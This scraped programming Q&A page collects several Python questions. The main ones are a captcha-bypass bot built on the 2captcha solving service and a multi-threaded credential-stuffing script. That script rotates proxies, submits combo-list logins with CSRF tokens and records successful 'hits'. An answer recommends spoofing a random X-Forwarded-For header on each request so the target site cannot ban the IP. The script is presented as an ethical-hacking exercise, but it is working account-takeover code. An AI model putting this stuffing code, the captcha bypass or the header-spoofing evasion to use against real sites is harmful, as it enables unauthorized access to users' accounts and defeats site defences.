How to solve python selenium 2captcha problem? - python

Here is my code.
while True:
username_box = self.driver.find_element_by_xpath(
'//*[#id="snapname"]')
username_box.send_keys('xxxx')
sleep(2)
age_select = Select(self.driver.find_element_by_id('age'))
age_select.select_by_value(random.choice(age_values))
sleep(2)
gender_select = Select(self.driver.find_element_by_id('gender'))
gender_select.select_by_value('female')
sleep(2)
add_me_btn = self.driver.find_element_by_id('submitBtn')
add_me_btn.click()
try:
logout = self.driver.find_element_by_xpath(
'//*[#id="wrap"]/div[1]/div/div[2]/ul/li/a')
logout.click()
sleep(2)
logout1 = self.driver.find_element_by_xpath(
"//*[#id='wrap']/div[1]/div/div[2]/ul/li/ul/li/a")
logout1.click()
sleep(5)
except:
service_key = 'Service key here'
google_site_key = 'Site key here'
pageurl = 'Page Url Here'
url = "http://2captcha.com/in.php?key=apikeyhere&method=userrecaptcha&googlekey=sitekeyhere&pageurl=pageurlhere"
resp = requests.get(url)
if resp.text[0:2] != 'OK':
quit('Service error. Error Code' + resp.text)
captcha_id = resp.text[3:]
fetch_url = "http://2captcha.com/res.php?key=apikeyhere&action=get&id=" + captcha_id
for i in range(1, 20):
sleep(5)
resp = requests.get(fetch_url)
if resp.text[0:2] == 'OK':
break
print('Time to solve:', time() - start_time)
submit_url = "urlhere"
headers = {
'user-agent': 'Mozilla/5.0 Chrome/52.0.2743.116 Safari/537.36'}
payload = {
'submit': 'submit',
'g-recaptcha-response': resp.text[3:]
}
resp = requests.post(submit_url, headers=headers, data=payload)
I'm trying to solve captcha for a site. I'm using 2captcha for this job. However This code cant solve the captcha. I mean bot working until this column:
print('Time to solve:', time() - start_time)
However after that returning the begining of while loop.What can be wrong with this code?

Have you checked if your captchas were sent to 2captcha? I mean here: https://2captcha.com/statistics/uploads
And what status they have if they are there?

Related

The new products added to the site in the loop while Webscraping are not detected by the bot [Python]

I have a bot for webscraping and it works fine. The only problem when a new product appears on the site, it is not detected by the bot. I have to relaunch the file for it to find. Do you have any solutions to this?
import requests
import time
import datetime
from discord import send_hook
from datetime import datetime
from colorama import Fore, Back, Style
from bs4 import BeautifulSoup
from colorama import init
init(autoreset=True)
headers = {
'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36', "Referer": "https://www.ldlc.com/"
}
a=0
def liens():
# for x in range (1,5):
url = f'https://www.ldlc.com/recherche/1660/+fcat-4684.html?sort=1'
reqs = requests.get(url,headers=headers, timeout=None, allow_redirects=False)
soup = BeautifulSoup(reqs.text, 'html.parser')
urls = []
productlist = soup.find_all('h3',{'class':'title-3'})
for item in productlist:
for link in item.find_all('a', href=True):
urls.append("https://www.ldlc.com"+link['href'])
print(f"Le nombre de request URL's : {a}")
return urls
prix = 400
wait_time = 259200
timed_pid = {p: 0 for p in liens()}
while True:
try:
liens()
a=a+1
print(f"Le nombre de request : {x}")
x=x+1
nombre_total_liens = len(liens())
print(f'Le nombre de liens trouvé : {nombre_total_liens}')
except:
print("Connection refused by the server..")
print("Let me sleep for 5 seconds")
print("ZZzzzz...")
time.sleep(5)
print("Was a nice sleep, now let me continue...")
continue
time.sleep(15)
for p in timed_pid:
if (time.time() - timed_pid[p]) < wait_time:
continue
url = "{}".format(p)
response = url
while response == url:
try:
response = requests.get(url, headers=headers, timeout=None, allow_redirects=False)
break
except:
print("Connection refused by the server..")
print("Let me sleep for 5 seconds")
print("ZZzzzz...")
time.sleep(5)
print("Was a nice sleep, now let me continue...")
continue
soup = BeautifulSoup(response.text, 'html.parser')
try:
title = soup.find('h1', class_='title-1').get_text().strip()
product_title = ':flag_fr:'+title
except:
print('Impossible de lire le titre du produit! Restart....')
continue
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
time_now = now.strftime("%d/%m/%Y - %H:%M:%S")
try:
image_url = soup.find('img', {'id':'ctl00_cphMainContent_ImgProduct'})['src']
except:
continue
try:
stock_statut = soup.find('div', class_='content').get_text().strip()
price = soup.find_all('div', class_='price')[3].get_text(strip=True).replace(',','.').replace(' ','').replace('€','.').replace(' ','').replace('\xa0','')
if stock_statut == 'Rupture':
print ('[{}]'.format(current_time), Fore.GREEN + Style.RESET_ALL, Fore.YELLOW + '[LDLC]' + Style.RESET_ALL,'|', Fore.RED + 'Rupture' + Style.RESET_ALL, Fore.CYAN + product_title + Style.RESET_ALL)
else:
f = float(price)
if f < prix:
print('[{}]'.format(current_time), Fore.GREEN + Style.RESET_ALL, Fore.YELLOW + '[LDLC]' + Style.RESET_ALL,'|', Fore.GREEN + 'En stock' + Style.RESET_ALL, Fore.CYAN + product_title + Style.RESET_ALL)
timed_pid[p] = time.time()
send_hook(product_title, url, image_url, price, stock_statut, time_now)
except:
continue
occasionally if you have improvements for speed or something else I will take it.
If you could help me, that will make me happy. I thank you in advance.

Python - save images to folder after requests

I have this function that fecthes a bunch of images:
def get_player_images_with_api():
url = 'https://footballapi.pulselive.com/football/players?pageSize=30&compSeasons=274&altIds=true&page={page}&type=player&id=-1&compSeasonId=274'
img_url = 'https://resources.premierleague.com/premierleague/photos/players/250x250/{player_id}.png'
headers = {'Origin': 'https://www.premierleague.com'}
page=0
while True:
try:
data = requests.get(url.format(page=page), headers=headers).json()
for player in data['content']:
print('{:<50} {}'.format(player['name']['display'], img_url.format(player_id=player['altIds']['opta'])))
sleep(2)
page+=1
except:
break
How do I dinamically save each image on a 'path/to/image' folder with player['name'].png format?
Here you go :)
import requests
from time import sleep
import urllib.request
def get_player_images_with_api():
url = 'https://footballapi.pulselive.com/football/players?pageSize=30&compSeasons=274&altIds=true&page={page}&type=player&id=-1&compSeasonId=274'
img_url = 'https://resources.premierleague.com/premierleague/photos/players/250x250/{player_id}.png'
headers = {'Origin': 'https://www.premierleague.com'}
page = 0
while True:
try:
data = requests.get(url.format(page=page), headers=headers).json()
for player in data['content']:
print('{:<50} {}'.format(
player['name']['display'],
img_url.format(player_id=player['altIds']['opta'])))
urllib.request.urlretrieve(
img_url.format(player_id=player['altIds']['opta']),
player['name']['display'] + ".png")
sleep(2)
page += 1
except:
break

Setting an expiration on a function for a retry

I am harvesting captcha, and captcha responses are only good for 2 minutes. I am trying to figure out how to set an "Expired, fetching again" function
def captchaToken():
global captoken
s = requests.Session()
# here we post site key to 2captcha to get captcha ID (and we parse it here too)
captcha_id = s.post("http://2captcha.com/in.php?key={}&method=userrecaptcha&googlekey={}&pageurl={}".format(APItoken, sitekey, url)).text.split('|')[1]
#time.sleep(5)
print("Waiting for captcha...")
# then we parse gresponse from 2captcha response
recaptcha_answer = s.get("http://2captcha.com/res.php?key={}&action=get&id={}".format(APItoken, captcha_id)).text
print("Solving captcha...")
while 'CAPCHA_NOT_READY' in recaptcha_answer:
print("Waiting for a response . . .")
time.sleep(2.5)
recaptcha_answer = s.get("http://2captcha.com/res.php?key={}&action=get&id={}".format(APItoken, captcha_id)).text
recaptcha_answer = recaptcha_answer.split('|')[1]
captoken = recaptcha_answer
print(Fore.MAGENTA + "Captcha Response: "+recaptcha_answer)
I'd suggest:
while 1:
captcha = get_captcha()
request = post_captcha(captcha)
start = time.time()
while 1:
response = poll_for_result(request)
if start + 120 < time.time():
time_is_up()
break
if response:
return deal_with_response(response)

Sending Asynchronous requests with Python requests library

As a part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that I've come up with following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from time import sleep
global proxy_queue
global user_queue
global hits
global stats
global start_time
def get_default_header():
return {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'https://www.example.com/'
}
def make_requests():
global user_queue
while True:
uname_pass = user_queue.get().split(':')
status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
if status == 1:
hits.put(uname_pass)
stats['hits'] += 1
if status == 0:
stats['fake'] += 1
if status == -1:
user_queue.put(':'.join(uname_pass))
stats['IP Banned'] += 1
if status == -2:
stats['Exception'] += 1
user_queue.task_done()
def get_status(uname, password):
global proxy_queue
try:
if proxy_queue.empty():
print 'Reloaded proxies, sleeping for 2 mins'
sleep(120)
session = requests.session()
proxy = 'http://' + proxy_queue.get()
login_url = 'http://example.com/login'
header = get_default_header()
header['X-Forwarded-For'] = '8.8.8.8'
login_page = session.get(
login_url,
headers=header,
proxies={
'http':proxy
}
)
tree = html.fromstring(login_page.text)
csrf = list(set(tree.xpath("//input[#name='csrfmiddlewaretoken']/#value")))[0]
payload = {
'email': uname,
'password': password,
'csrfmiddlewaretoken': csrf,
}
result = session.post(
login_url,
data=payload,
headers=header,
proxies={
'http':proxy
}
)
if result.status_code == 200:
if 'access_token' in session.cookies:
return 1
elif 'Please check your email and password.' in result.text:
return 0
else:
# IP banned
return -1
else:
# IP banned
return -1
except Exception as e:
print e
return -2
def populate_proxies():
global proxy_queue
proxy_queue = Queue()
with open('nice_proxy.txt', 'r') as f:
for line in f.readlines():
proxy_queue.put(line.replace('\n', ''))
def hit_printer():
while True:
sleep(5)
print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),
if __name__ == '__main__':
global user_queue
global proxy_queue
global stats
global start_time
stats = dict()
stats['hits'] = 0
stats['fake'] = 0
stats['IP Banned'] = 0
stats['Exception'] = 0
threads = 200
hits = Queue()
uname_password_file = '287_uname_pass.txt'
populate_proxies()
user_queue = Queue(threads)
for i in range(threads):
t = Thread(target=make_requests)
t.daemon = True
t.start()
hit_printer = Thread(target=hit_printer)
hit_printer.daemon = True
hit_printer.start()
start_time = time.time()
try:
count = 0
with open(uname_password_file, 'r') as f:
for line in f.readlines():
count += 1
if count > 2000:
break
user_queue.put(line.replace('\n', ''))
user_queue.join()
print '####################Result#####################'
while not hits.empty():
print hits.get()
ttr = round(time.time() - start_time, 3)
print 'Time required: ' + str(ttr)
print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
except Exception as e:
print e
So it is expected to make many requests on the website through multiple threads, but it doesn't work as expected. After a few requests, the proxies get banned, and it stops working. Since I'm disposing off the proxy after I use it, it shouldn't be the case. So I believe it might be due to one of the following
In an attempt to make multiple requests using multiple sessions, it's somehow failing to maintain disparateness for not supporting asynchronicity.
The victim site bans IPs based on its groups e.g., Banning all IPs starting with 132.x.x.x on receiving multiple requests from any of the 132.x.x.x IPs
The victim site is using headers like 'X-Forwarded-for', 'Client-IP', 'Via', or a similar header to detect the originating IP. But it seems unlikely because I can log in via by browser, without any proxy, and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I am unsure weather I'm making an error in the threading part or the requests part, any help is appreciated.
I have figured out what the problem was, thanks to #Martijn Pieters, as usual, he's a life saver.
I was using elite level proxies and there was no way the victim site could have found my IP address, however, it was using X-Forwarded-For to detect my root IP address.
Since elite level proxies do not expose the IP address and don't attach the Client-IP header, the only way the victim could detect my IP was using the latest address in X-Forwarded-For. The solution to this problem is setting the X-Forwarded-For header to a random IP address everytime a requests is made which successfully spoofs the victim site into believing that the request is legit.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])

How do you print a function that returns a request in Python?

I have a function that gets the profile data of an user:
API.py
def getProfileData(self):
data = json.dumps({
'_uuid' : self.uuid,
'_uid' : self.username_id,
'_csrftoken' : self.token
})
return self.SendRequest('accounts/current_user/?edit=true', self.generateSignature(data))
I want to print the returned request in the terminal, so I did this:
test.py
from API import API
API = API("username", "password")
API.login() # login
print(API.getProfileData())
But nothing is logged in the console.
Maybe I'm doing it the JavaScript way, since that's my background.
What's the correct way to do it?
EDIT:
This is what's inside SendRequest:
def SendRequest(self, endpoint, post = None, login = False):
if (not self.isLoggedIn and not login):
raise Exception("Not logged in!\n")
return;
self.s.headers.update ({'Connection' : 'close',
'Accept' : '*/*',
'Content-type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Cookie2' : '$Version=1',
'Accept-Language' : 'en-US',
'User-Agent' : self.USER_AGENT})
if (post != None): # POST
response = self.s.post(self.API_URL + endpoint, data=post) # , verify=False
else: # GET
response = self.s.get(self.API_URL + endpoint) # , verify=False
if response.status_code == 200:
self.LastResponse = response
self.LastJson = json.loads(response.text)
return True
else:
print ("Request return " + str(response.status_code) + " error!")
# for debugging
try:
self.LastResponse = response
self.LastJson = json.loads(response.text)
except:
pass
return False
def getTotalFollowers(self,usernameId):
followers = []
next_max_id = ''
while 1:
self.getUserFollowers(usernameId,next_max_id)
temp = self.LastJson
for item in temp["users"]:
followers.append(item)
if temp["big_list"] == False:
return followers
next_max_id = temp["next_max_id"]
def getTotalFollowings(self,usernameId):
followers = []
next_max_id = ''
while 1:
self.getUserFollowings(usernameId,next_max_id)
temp = self.LastJson
for item in temp["users"]:
followers.append(item)
if temp["big_list"] == False:
return followers
next_max_id = temp["next_max_id"]
def getTotalUserFeed(self, usernameId, minTimestamp = None):
user_feed = []
next_max_id = ''
while 1:
self.getUserFeed(usernameId, next_max_id, minTimestamp)
temp = self.LastJson
for item in temp["items"]:
user_feed.append(item)
if temp["more_available"] == False:
return user_feed
next_max_id = temp["next_max_id"]
If all you want to do is print the response that you get back, you can do that in SendRequest, but I suspect tha tyour real problem is that you are self-serializing your post data when requests does that for you. In any case, since your question is about printing:
if response.status_code == 200:
print('Yay, my response was: %s' % response.content)
self.LastResponse = response
self.LastJson = json.loads(response.text)
return True
else:
print ("Request return " + str(response.status_code) + " error!")
# for debugging
try:
self.LastResponse = response
self.LastJson = json.loads(response.text)
except:
pass
return False

Categories

Resources